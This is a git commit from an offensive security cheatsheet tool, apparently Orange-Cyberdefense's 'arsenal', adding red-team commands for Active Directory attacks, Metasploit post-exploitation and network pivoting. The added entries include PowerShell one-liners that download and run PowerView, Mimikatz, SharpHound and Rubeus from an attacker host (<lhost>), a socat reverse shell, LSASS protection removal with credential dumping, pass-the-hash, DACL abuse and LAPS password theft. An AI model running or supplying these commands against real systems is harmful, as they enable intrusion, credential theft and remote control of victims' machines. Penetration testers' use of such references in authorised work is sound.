add multiple cheatsheet commands

Orange-Cyberdefense · Feb 19, 2022 · d4ccc18 · d4ccc18
1 parent d985341
commit d4ccc18
Show file tree

Hide file tree

Showing 18 changed files with 373 additions and 12 deletions.
diff --git a/.gitignore b/.gitignore
@@ -2,6 +2,7 @@
 .idea/
 __pycache__/
 *.pyc
+arsenal/data/cheats/.obsidian/
 cheats/.obsidian/
 cheats/Arsenal/.obsidian/
 arsenal.egg-info/

diff --git a/arsenal/data/cheats/Active_directory/SCShell.md b/arsenal/data/cheats/Active_directory/SCShell.md
@@ -0,0 +1,13 @@
+# SCShell
+
+% SCShell, psexec, sealthy, DCERPC
+
+## stealty psexec
+#plateform/linux #target/remote #cat/ATTACK/CONNECT 
+
+no service created, no smb used, no file droped
+https://github.com/Mr-Un1k0d3r/SCShell
+
+```
+python3 scshell.py -service-name <service-name|defragsvc> -hashes :<ntlm-hash> <domain>/<user>@<ip>
+```
diff --git a/arsenal/data/cheats/Active_directory/bloodhound.md b/arsenal/data/cheats/Active_directory/bloodhound.md
@@ -43,6 +43,14 @@ import-module sharphound.ps1
 invoke-bloodhound -collectionmethod all -domain <domain>
 ```
 
+## sharphound - collect bloodhound data download and execute
+#plateform/windows #target/remote #port/389 #port/631 #cat/RECON
+https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
+
+```powershell
+(new-object system.net.webclient).downloadstring('http://<lhost>/SharpHound.ps1') | Invoke-BloodHound -CollectionMethod All  -domain <domain>
+```
+
 ## cypheroth - start
 #plateform/linux #target/local #cat/RECON 
 Toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.

diff --git a/arsenal/data/cheats/Active_directory/kerberos.md b/arsenal/data/cheats/Active_directory/kerberos.md
@@ -31,3 +31,11 @@ msfconsole -x "use auxiliary/admin/kerberos/ms14_068_kerberos_checksum"
 ```
 msfconsole -x "use scanner/smb/smb_enum_gpp"
 ```
+
+## powershell - get user SPN
+#plateform/windows #target/remote #port/88 #protocol/kerberos #cat/RECON 
+
+https://github.com/nidem/kerberoast
+```powershell
+(new-object system.net.webclient).downloadstring('http://<lhost>/GetUserSPNs.ps1') | IEX
+```
diff --git a/arsenal/data/cheats/Active_directory/laps.md b/arsenal/data/cheats/Active_directory/laps.md
@@ -20,6 +20,16 @@ Import-Module .\LAPSToolkit.ps1
 Find-LAPSDelegatedGroups
 ```
 
+## powerview get laps password
+```powershell
+Get-DomainObject <computer> -Properties "ms-mcs-AdmPwd",name
+```
+
+## metasploit get laps password
+```
+use windows/gather/credentials/enum_laps
+```
+
 ## get all machine passwords
 #plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 
 ```

diff --git a/arsenal/data/cheats/Active_directory/powerview.md b/arsenal/data/cheats/Active_directory/powerview.md
@@ -2,6 +2,15 @@
 
 % ad, windows, powerview
 
+## load from remote
+#plateform/windows #target/remote  #cat/RECON 
+
+https://github.com/PowerShellMafia/PowerSploit/
+
+```powershell
+(new-object system.net.webclient).downloadstring('http://<lhost>/powerview.ps1') | IEX
+```
+
 ## Get User from SID
 #plateform/windows #target/remote  #cat/RECON 
 ```powershell
@@ -20,6 +29,12 @@ Get-ObjectAcl -Identity <user> -ResolveGUIDs | Foreach-Object {$_ | Add-Member -
 Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
 ```
 
+## Add user DACL
+#plateform/windows #target/remote  #cat/ATTACK
+```powershell
+Add-DomainObjectAcl -TargetIdentity <target> -PrincipalIdentity <current_user> -Rights All
+```
+
 ## Find all groups our current user got access
 #plateform/windows #target/remote  #cat/RECON 
 ```powershell

diff --git a/arsenal/data/cheats/Active_directory/rubeus.md b/arsenal/data/cheats/Active_directory/rubeus.md
@@ -8,6 +8,18 @@
 .\Rubeus.exe ptt /ticket:<ticket>
 ```
 
+## load rubeus from powershell
+#plateform/windows #target/local #cat/UTILS 
+```powershell
+$data = (New-Object System.Net.WebClient).DownloadData('http://<lhost>/Rubeus.exe');$assem = [System.Reflection.Assembly]::Load($data);
+```
+
+## execute rubeus from powershell
+#plateform/windows #target/remote #cat/UTILS 
+```powershell
+[Rubeus.Program]::MainString("klist");
+```
+
 ## monitor
 #plateform/windows #target/remote #cat/ATTACK/EXPLOIT  
 ```cmd

diff --git a/arsenal/data/cheats/Metasploit/msf.md b/arsenal/data/cheats/Metasploit/msf.md
@@ -20,14 +20,27 @@ sessions -l
 route print
 ```
 
-## add pivot
+## add pivot (autoroute)
 #plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 
+exemple : 
+use multi/manage/autoroute
+set session 1
+exploit
 ```
 use multi/manage/autoroute
 ```
 
-## add socks proxy
+## add socks proxy (autoroute first)
 #plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 
+
+exemple : 
+use multi/manage/autoroute
+set session 1
+exploit
+use auxiliary/server/socks_proxy
+set srvhost 127.0.0.1
+exploit -j
+
 ```
 use auxiliary/server/socks_proxy
 ```
@@ -43,3 +56,29 @@ load incognito
 ```
 impersonate_token <domain>\\<user>
 ```
+## create process
+#plateform/linux #target/local #cat/UTILS 
+```
+execute -H -f <process|notepad>
+```
+
+## migrate with name
+#plateform/linux #target/local #cat/ATTACK/INJECTION 
+```
+migrate -N <process_name|notepad.exe>
+```
+
+##  PPL remove
+#plateform/linux #target/local #cat/ATTACK/INJECTION 
+```
+load kiwi
+kiwi_cmd "!processprotect /process:lsass.exe /remove"
+creds_all
+```
+
+## enum LAPS
+#plateform/linux #target/local #cat/ATTACK
+```
+use post/windows/gather/credentials/enum_laps
+```
+
diff --git a/arsenal/data/cheats/Network/chisel.md b/arsenal/data/cheats/Network/chisel.md
@@ -0,0 +1,49 @@
+# chisel
+
+% chisel
+
+## chisel server (server on local machine)
+#plateform/linux  #target/remote  #cat/PIVOT 
+All commands on arsenal are done with server on kali machine and client on the target.
+Client or Server can also be launch on windows with chisel.exe
+```
+./chisel server -v -p <server_port|8000> --reverse
+```
+
+## chisel reverse port forwarding (client on remote machine) - forward client port on server
+#plateform/linux  #target/remote  #cat/PIVOT 
+
+This forward {clientside-host}:{clientside-port} to server {local-port}
+To get the port of the client machine locally on serverside.
+ex: R:2222:localhost:22 to get the client 22 (ssh) on the port 2222 of the server
+| server | - 2222 <-----  |client|-127.0.0.1:22
+on server : ssh -p 2222 127.0.0.1
+
+```
+./chisel client -v <server_ip>:<server_port|8000> R:<serverside-port>:<clientside-host|localhost>:<clientside-port>
+```
+
+## chisel remote port forwarding (client on remote machine) - forward server port on client
+#plateform/linux  #target/remote  #cat/PIVOT 
+
+To expose server port remotely (usefull to expose your listener)
+This forward {serverside-host}:{serverside-port} from the server to {clientside-host}:{clientside-port}
+ex : 0.0.0.0:4445:127.0.0.1:4444 expose the server 4444 listener to client 4445
+| server | - 4444 ------->  |client|-4445 : *   <-
+
+```
+./chisel client -v <server_ip>:<server_port|8000> <clientside-host|0.0.0.0>:<clientside-port>:<serverside-host|127.0.0.1>:<serverside-port>
+```
+
+## chisel socks proxy (client on remote machine)
+#plateform/windows  #target/remote  #cat/PIVOT 
+
+If the server is launch with --reverse you can specify R: socks to get a proxy socks on server machine (port 1080)
+On server with proxychains set on port 1080 you can proxy socks request on the client.
+
+```
+./chisel client <server_ip>:<server_port> R:socks
+```
+
+
+
diff --git a/arsenal/data/cheats/Network/socat.md b/arsenal/data/cheats/Network/socat.md
@@ -0,0 +1,28 @@
+# socat
+
+% socat
+
+## socat port forwarding listener (on local machine)
+#plateform/linux  #target/remote  #cat/PIVOT 
+```
+./socat TCP-LISTEN:<port_listener|4444>,fork,reuseaddr TCP-LISTEN:<port_to_forward>
+```
+
+## socat port forwarding connect (on remote machine)
+#plateform/linux  #target/remote  #cat/PIVOT 
+```
+./socat TCP:<connect_ip>:<connect_port|4444> TCP:127.0.0.1:<port_to_forward>
+```
+
+## socat reverse shell (remote victime)
+#plateform/linux  #target/remote  #cat/PIVOT 
+```
+./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listner_ip>:<listner_port|4444>
+```
+
+## socat reverse shell listener (local)
+#plateform/linux  #target/remote  #cat/PIVOT 
+```
+socat file:`tty`,raw,echo=0 tcp-listen:<listner_port|4444>
+```
+
diff --git a/arsenal/data/cheats/Password extraction/LAPS.md b/arsenal/data/cheats/Password extraction/LAPS.md
@@ -0,0 +1,30 @@
+# LAPS
+
+% LAPS, passwords
+
+## laps toolkit
+#plateform/windows  #target/remote  #cat/POSTEXPLOIT/CREDS_RECOVER 
+
+https://github.com/leoloobeek/LAPSToolkit
+
+```powershell
+(new-object system.net.webclient).downloadstring('http://<lhost>/LAPSToolkit.ps1') | IEX; Import-Module .\LAPSToolkit.ps1
+```
+
+## laps toolkit - Get laps computer
+#plateform/windows  #target/remote  #cat/RECON 
+```powershell
+Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers
+```
+
+## laps toolkit - find LAPS Delegated Groups
+#plateform/windows  #target/remote  #cat/RECON 
+```powershell
+Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups
+```
+
+## laps toolkit - Find users with Extented rights
+#plateform/windows  #target/remote  #cat/RECON 
+```powershell
+Import-Module .\LAPSToolkit.ps1; Find-AdmPwdExtendedRights
+```
diff --git a/arsenal/data/cheats/Password extraction/mimikatz.md b/arsenal/data/cheats/Password extraction/mimikatz.md
@@ -8,6 +8,13 @@
 mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
 ```
 
+## powershell - load mimikatz
+https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
+```powershell
+(new-object system.net.webclient).downloadstring('http://<lhost>/Invoke-Mimikatz.ps1') | IEX
+Invoke mimikatz
+```
+
 ## mimikatz disable PPL and dump passwords
 #plateform/windows  #target/local  #cat/POSTEXPLOIT/CREDS_RECOVER
 ```
@@ -64,3 +71,16 @@ sids :  ExtraSid value (Enterprise Admins SID) : parent SID
 kerberos::golden /user:<user> /domain:<domain> /sid:<child_sid> /krbtgt:<krbtgt_ntlm> /sids:<parent_sid>-519 /ptt
 ```
 
+% mimikatz, pth
+## mimikatz pth to RDP mstsc.exe
+#plateform/windows  #target/local  #cat/PIVOT 
+```
+sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:"mstsc.exe /restrictedadmin"
+```
+
+## mimikatz pth run powershell remotelly
+#plateform/windows  #target/local  #cat/PIVOT 
+Followed by : Enter-PSSession -Computer {<}computer_name}
+```
+sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:powershell
+```
diff --git a/arsenal/data/cheats/Protocol/ldap.md b/arsenal/data/cheats/Protocol/ldap.md
@@ -14,6 +14,12 @@ nmap -n -sV --script "ldap* and not brute" -p 389 <ip>
 ldapsearch -x -h <ip> -s base
 ```
 
+## ldapsearch SPN
+#cat/ATTACK/CONNECT 
+```
+ldapsearch -Y GSSAPI -H ldap://<dc_fqdn> -D "<user>" -W -b "dc=<domain_name>,dc=com" "servicePrincipalName=*" servicePrincipalName
+```
+
 ## ldapsearch with base dn
 #cat/ATTACK/CONNECT 
 ```

diff --git a/arsenal/data/cheats/Protocol/rdp.md b/arsenal/data/cheats/Protocol/rdp.md
@@ -9,6 +9,23 @@
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 ```
 
+## enable restricted admin
+#cat/POSTEXPLOIT 
+```
+New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
+```
+
+## disable restricted admin
+#cat/POSTEXPLOIT 
+```
+Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
+```
+
+## rdp from console
+```
+sharprdp.exe computername=<computer> command="<command>" username=<domain>\<user> password=<password>
+```
+
 ## Add firewall authorisation RDP
 #cat/POSTEXPLOIT 
 ```